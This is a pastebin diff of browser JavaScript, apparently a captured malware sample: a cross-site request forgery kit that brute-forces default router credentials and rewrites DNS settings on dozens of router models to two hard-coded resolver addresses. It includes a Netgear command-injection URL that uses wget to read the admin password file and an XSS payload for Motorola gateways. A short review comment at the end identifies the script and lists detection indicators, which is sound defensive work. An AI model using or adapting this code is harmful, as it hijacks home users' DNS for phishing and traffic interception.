View difference between Paste ID: RX73Vs89 and WZzgXeRu
1
var pDNS = "200.98.30.219";
2
var sDNS = "155.133.82.21";
3
var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"];
4
var gstp=400;
5
var pstp=5000;
6
function exp(url, data, method){
7
    if(method=="GET"){
8
    document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
9
    if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
10
    }
11
    else{
12
        document.write("<body></body>");
13
        var ifrm = document.createElement("IFRAME");
14
        ifrm.height="1px";
15
        ifrm.width="1px";
16
        document.body.appendChild(ifrm);
17
        
18
        var f=ifrm.contentWindow.document.createElement("FORM");
19
        f.name='f';
20
        f.method=method;
21
        f.action=url;
22
        var el=data.split('&');
23
        for(i=0;i<el.length;i++)
24
        {
25
            var e=el[i].split('=');
26
            var t=ifrm.contentWindow.document.createElement('INPUT');
27
            t.type='TEXT';
28
            t.id=e[0];
29
            t.name=e[0];
30
            t.value=e[1];
31
            f.appendChild(t);
32
        }
33
        ifrm.contentWindow.document.body.appendChild(f);
34
        f.submit();
35
        var tm=setTimeout(function(){window.stop();},pstp);
36
    }
37
}
38
function srq(ip) { 
39
    for(i=0;i<12;i++){
40
    
41
    var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
42
    var method = "GET";
43
    url = url1.replace("$1$","");
44
    var cred="admin";
45
    if(passlist[i]!="")
46
        cred=cred+":"+passlist[i];
47
    cred = cred+"@";    
48
    url = url1.replace("$1$",cred);
49
    exp(url, "", method);
50
    }
51
    
52
}
53
function e_belkin(ip)
54
{
55
    var method = "POST";
56
    var url = "";
57
    var data ="";
58
    
59
    url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
60
    exp(url, "", "GET");
61
    
62
    url="http://"+ip+"/cgi-bin/setup_dns.exe";
63
    data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
64
    exp(url, data, method);
65
}
66
67
function e_webcam(ip)
68
{
69
}
70
71
function p_exp(ip) { 
72
    e_belkin(ip);
73
    e_webcam(ip);
74
    
75
    var method = "POST";
76
    var url = "";
77
    var data ="";
78
    
79
    url = "http://admin:admin@"+ip+"/apply.cgi";
80
    data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
81
    exp(url, data, method);
82
    
83
    url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
84
    data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
85
    exp(url, data, method);
86
    
87
    url="http://"+ip+"/goform/AdvSetDns";
88
    data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
89
    exp(url, data, method); /*Unicorn WB-3300NR*/
90
    
91
    url="http://"+ip+"/login.cgi";
92
    data="login_name=admin&login_pass=";
93
    exp(url, data, method);
94
    
95
    url="http://"+ip+"/h_wan_fix.cgi";
96
    data="static_dns1="+pDNS+"&static_dns2="+sDNS;
97
    exp(url, data, method);
98
    
99
}
100
101
function e_moto(ip)
102
{
103
    /*var method = "GET";
104
    var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
105
    exp(url, "", method);   
106
    
107
    url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
108
    exp(url, "", POST); */
109
    var i1 = document.createElement('IMG');
110
    document.body.appendChild(i1);
111
    var i2 = document.createElement('IMG');
112
    document.body.appendChild(i2);
113
    i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
114
    i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
115
    
116
}/*Motorola*/
117
118
function r_exp(ip) {
119
    
120
    var method = "GET";
121
    var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
122
    //exp(url, "", method);
123
    
124
    url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1"; 
125
    exp(url, "", method); /*DGN 1000/DGN2200*/
126
    
127
    url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0"; 
128
    exp(url, "", method); /*asus rt n66u*/
129
    
130
    url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
131
    exp(url, "", method); /*asus rt n56u*/
132
    
133
    url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
134
    exp(url, "", method); /*asus rt n56u*/
135
    
136
    url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
137
    exp(url, "", method);/*asus nt-12*/
138
    
139
    url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
140
    exp(url, "", method);
141
    
142
    url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
143
    exp(url, "", method);
144
    
145
    url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
146
    exp(url, "", method); /*Philips*/
147
    
148
    url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
149
    exp(url, "", method);/*Motorola SBG901*/
150
     
151
    url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
152
    exp(url, "", method);
153
    
154
    url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
155
    exp(url, "", method);
156
    
157
    url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
158
    exp(url, "", method);
159
    
160
    url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
161
    exp(url, "", method);
162
    
163
    url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
164
    exp(url, "", method);
165
    
166
    url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
167
    exp(url, "", method);
168
    
169
    url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
170
    exp(url, "", method);
171
    
172
    url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
173
    exp(url, "", method);
174
    
175
    url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
176
    exp(url, "", method);
177
    
178
    url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
179
    exp(url, "", method);
180
    
181
    url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
182
    exp(url, "", method);
183
    
184
    url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
185
    exp(url, "", method);
186
    
187
    url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
188
    exp(url, "", method);
189
    
190
    url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
191
    exp(url, "", method);
192
    
193
    url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+""; 
194
    exp(url, "", method);
195
    
196
    url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
197
    exp(url, "", method);
198
    
199
    url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
200
    exp(url, "", method);
201
    
202
    url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
203
    exp(url, "", method);
204
    
205
    url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
206
    exp(url, "", method); /*DI 604*/
207
    
208
    
209
    var t=setTimeout(function(){p_exp(ip);},1000);
210
    srq(ip);
211
    e_moto(ip);
212
}
213
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
214
//if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
215
216
runweb(function(ip) {
217
    //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
218
        //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
219
        var sip = ip.split(".");
220
221
        ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
222
        //var i = 0;
223
        //var j = 0;
224
        //for (i = 0; i < gw.length; i++) {
225
        //    if (ip == gw[i]) {
226
        //        j = j + 1;
227
        //        break;
228
        //    }
229
        //};
230
        //i = i + 1;
231
        //if (j > 0) {
232
            r_exp(ip);
233
        //};
234
    //}
235
});
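Review bot: Nothing on the page labels this listing as what it is, a browser-side router DNS changer: `srq`, `e_belkin`, `p_exp`, `e_moto` and `r_exp` all build cross-site requests to router admin endpoints, most with default credentials in the URL userinfo, that set the resolvers to `pDNS`/`sDNS`. A header comment such as `/* Captured sample: CSRF router DNS changer; indicators pDNS 200.98.30.219, sDNS 155.133.82.21 */` would make it identifiable in an archive and searchable by indicator. `runweb` is called at the end but not defined in this paste, so how the client address is obtained is not visible here; the callback only rewrites it to the `.1` host of the same /24. For detection, the stable signals are a browser issuing `http://user:pass@<gateway>` requests that carry DNS-setting parameters, and routers whose configured resolvers match those two addresses. Non-default admin passwords and current firmware remove most of what the script depends on.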